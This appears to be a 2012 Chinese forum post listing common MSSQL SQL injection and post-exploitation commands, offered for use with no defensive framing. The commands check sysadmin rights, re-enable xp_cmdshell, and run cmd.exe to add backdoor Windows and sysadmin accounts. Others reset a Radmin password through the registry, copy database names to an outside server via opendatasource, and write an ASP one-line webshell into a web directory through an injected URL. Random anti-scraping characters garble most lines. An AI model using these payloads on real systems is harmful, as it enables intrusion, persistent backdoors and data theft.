找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2115|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
! k( t5 S; g7 T! D* c1 Z6 Oand 1=(Select IS_MEMBER('db_owner'))
. r/ R8 M! B: _3 x# iAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--* a* k9 y1 }5 ?+ a! A  m# D9 Z% X

/ C# B7 p" S3 E0 F' \6 E//检测是否有读取某数据库的权限
1 h: Z5 z, i  C2 {% Wand 1= (Select HAS_DBACCESS('master'))
8 Y5 K8 a$ T+ T" z( X' S% ~And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --' N2 C+ i" R, f& I# P0 A% H

2 Z5 e- o1 F" D, l$ v# m/ J0 \8 k$ w: \! X( L
数字类型7 d* [% b4 ^8 b$ ?* f" C
and char(124)%2Buser%2Bchar(124)=0
6 g3 g+ F' a/ _- V4 D% h/ N0 v8 f& k" G* Q' Q  u
字符类型( C8 x* A+ `: o
' and char(124)%2Buser%2Bchar(124)=0 and ''='! m6 f3 n  j) G  l
$ Q; O' H: O6 K/ y$ S, @
搜索类型5 P( L% V# z$ f- I
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
" J* h! k1 V& c7 n! C: f
5 T+ t9 l% x9 L* @爆用户名
1 p; V5 w4 S2 l* i# uand user>0
7 S& O5 f3 d- d* Z: ], i' and user>0 and ''='  H6 g" {0 ~0 Z5 `( `" W4 O

0 [/ j# t! D# r+ A检测是否为SA权限
4 i3 U( X+ b* p' Y  _( B9 Aand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
- v; t- y- l$ |- _" VAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --& F6 a( J7 k, P8 c- ]4 q& e8 ^9 \

( e9 l) p' r# J. b检测是不是MSSQL数据库
/ i# ~: f" L2 Q" n6 Hand exists (select * from sysobjects);--
* i$ U! d4 b5 a2 s  v: Q6 T  p# x6 T* M# M$ C
检测是否支持多行
# [2 A+ ]. ^% j  y; C3 w;declare @d int;--
7 t3 l7 c, w# \9 J( T% d8 @
. L9 H" _0 M+ O1 Q8 d! |4 w4 V恢复 xp_cmdshell3 ?, V6 j7 S% R* a/ j
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--+ E) P# v7 V3 ?& M2 X: ?% {
* [: B0 ?6 h! Z+ s! K: ~

  x* T3 k7 E. xselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
5 ^( e) |8 p& ]/ T7 q7 j/ f3 U- e8 q" Z  ?+ {% T
//-----------------------! U1 M1 v' T# c# _
//       执行命令( ^0 t$ \1 G8 b& h3 q$ C! g% o/ Z$ C
//-----------------------
8 ^" `2 j1 h% v首先开启沙盘模式:
9 R+ \  K9 a# E+ j- P( H3 pexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; H0 U; ?) z! x5 h$ F
. ~# N" h* D9 ^9 k
然后利用jet.oledb执行系统命令
3 M1 [- e) B8 \select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
+ o6 b( p, K2 Y8 o! {
* {5 P/ r  `) R; o% I  d执行命令
. c( i" W1 _3 M( H# i" w; L# p, Z' U;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--2 q( l$ Q, h- A2 a7 M- N
* j+ R3 O. y! a$ Z' P0 N/ D
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
) c6 M0 u9 x+ T4 e9 _; b
! Y( Q: ~0 G8 H% D判断xp_cmdshell扩展存储过程是否存在:
; Z! r( _/ d8 U+ C7 }! ohttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
& W( u/ R2 z# o( _  t( }4 F$ x& P( C- t- S! V
写注册表
; D2 n% t! Z! ]exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
/ D. r% ?# o$ q% T4 R9 T0 v* T6 B5 R. j" i
REG_SZ
/ e% Q4 e4 \/ {! l# B  F
$ z/ i& Q3 K! c% {) L, I& D. B# F读注册表8 n9 g+ |4 M5 B/ V# W
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'+ U- k5 O* i9 T2 I6 K1 {7 r" ~
0 Y/ w5 H: ?' F$ L6 h. r
读取目录内容
/ y0 N6 `0 q( \* I7 Y0 h; Bexec master..xp_dirtree 'c:\winnt\system32\',1,1
4 e$ N1 T. M2 S7 y0 N% k/ J  Y
; K) s' z* s8 u; M8 |, V( C3 O" {( Q7 E7 B3 r3 [- C
数据库备份
* X8 |# I$ c% W& k* bbackup database pubs to disk = 'c:\123.bak'
: k& ~* z9 l! t! E
) B& e  B; s5 F. o: a//爆出长度( s. z" \, k% n4 q  X7 y
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--1 l& e7 W5 q# v4 P- C- Y

4 `  s7 \& }$ ]  ~5 s( n7 b, F3 y, m& l; d

" A4 J! [8 x/ @2 @4 h: C5 T更改sa口令方法:用sql综合利用工具连接后,执行命令:
9 d5 J( ?" F# [, ?' Dexec sp_password NULL,'新密码','sa'
9 u/ i, g9 _' Z" X( k' A* ?9 m, |' N( U
添加和删除一个SA权限的用户test:
7 O+ [6 a; ]6 B0 V! i. ]* Q# ]7 eexec master.dbo.sp_addlogin test,9530772
, v& o  z: w& v0 mexec master.dbo.sp_addsrvrolemember test,sysadmin
$ a. ^5 \# O: T6 ]1 o! P
% w3 i8 K; c8 L删除扩展存储过过程xp_cmdshell的语句:
1 x2 Y: L- H% x3 _( T8 @exec sp_dropextendedproc 'xp_cmdshell'
: C+ z: m8 _( x0 @* f1 j! u* j6 O8 ~* G* V( n$ n. l5 Z
添加扩展存储过过程
1 ~- D/ Y. m; j$ z1 z! pEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
- C9 y0 n' h8 J5 V" B' ?GRANT exec On xp_proxiedadata TO public
$ X3 j2 T. }/ `2 }; C9 P& `/ Q- D' q
$ e2 P0 e1 Z+ t3 A% ~* x) v- F( v- y2 h
停掉或激活某个服务。" P2 F! g& d( a" f: U: a9 k

2 N8 k( z3 M8 F- M! Cexec master..xp_servicecontrol 'stop','schedule'
6 [' b; R) @) g: Y* z* Z9 fexec master..xp_servicecontrol 'start','schedule', L6 O- O5 S6 n; N9 q% `

4 C3 q* I0 x6 X) Kdbo.xp_subdirs
( q/ e* X8 |3 U# y& d; D1 y! w5 ?. w3 I  Q$ h* Z* B
只列某个目录下的子目录。6 K3 v  i' p( Z" {! y( j
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
& y7 U6 [/ S) q% g/ N, X- I/ N1 t# `
dbo.xp_makecab
# y; z! L! X0 _1 A6 Y8 e& \1 q! o7 E
将目标多个档案压缩到某个目标档案之内。# s& C- {  x9 {# X7 @( @
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。" \/ p* K: M8 ^9 H9 ?
% g, z/ V0 Q, V7 m+ }
dbo.xp_makecab9 b) V0 Z" e9 \& t& k, V
'c:\test.cab','mszip',1,
2 T: h' K3 O, m$ k7 g/ C) a'C:\Inetpub\wwwroot\SQLInject\login.asp',' B9 e% P+ k+ S9 G
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
& _  s* x" S2 P. V) m7 g# Z! w1 H5 D6 \' o+ a) r( d  O
xp_terminate_process
* v6 G1 o, j7 J' N0 A2 }" C2 F
% y* h1 s6 A8 B$ z) ~停掉某个执行中的程序,但赋予的参数是 Process ID。
8 @) C4 D: w& G' L+ o1 t) v利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID2 J! D5 z! i' `. b2 E3 G6 s
8 j. {3 }: p. E0 [' ]4 O1 z
xp_terminate_process 24845 A: H3 K! e# v2 b% E
5 n$ y+ X+ V& b9 r0 A# \
xp_unpackcab0 p7 H* b8 U$ `7 N2 U! M

7 L4 H2 B  d' G解开压缩档。# z0 k, t1 P, |
0 L6 r1 R; y) D8 }. U
xp_unpackcab 'c:\test.cab','c:\temp',1
- [2 R9 D+ v- i+ C1 N* b7 b3 }3 Y5 Y4 b. e/ s/ b
) Y6 \6 Z* {  Z5 p- a4 [' R
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
! n5 Y4 v' E' r! ?* H2 H; Z$ S( R7 R! u7 F' p: Z
create database lcx;
: g5 O, ~" |* mCreate TABLE ku(name nvarchar(256) null);
4 j9 ?/ D$ |. \Create TABLE biao(id int NULL,name nvarchar(256) null);2 E' j5 M( k7 O

: T1 z8 p) ?- C; V$ E" V//得到数据库名
7 d- d# X7 B0 R  H& Oinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
2 Z1 j2 r0 p0 Y. {; r6 a; V
) u9 k( j+ w' P7 {; _' x
/ o# r; a& }8 v" {//在Master中创建表,看看权限怎样6 Q6 r2 M2 t8 t
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--  |* G) E1 E( {; j
; }7 i% C$ x( C8 w* N% {
用 sp_makewebtask直接在web目录里写入一句话马:' N" M6 h2 I& ^$ x: W9 ^! ?
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
* F; B1 l5 F) u% }" A6 T1 w  T. d6 s, Y" j- j3 Q; F
//更新表内容& s$ y5 L" B# o' D+ Z
Update films SET kind = 'Dramatic' Where id = 123
9 v3 Y7 g0 a) D9 e& `* a1 |; s- O
2 [- ~) {+ @7 n; K0 [- J2 K//删除内容5 b- h% G+ f" t1 A
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表